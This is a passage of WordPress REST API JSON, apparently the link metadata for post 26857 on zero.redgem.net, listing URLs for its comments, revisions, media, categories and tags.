Fv2%2Fcomments&post=26857"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/26857\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=26857"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=26857"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=26857"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}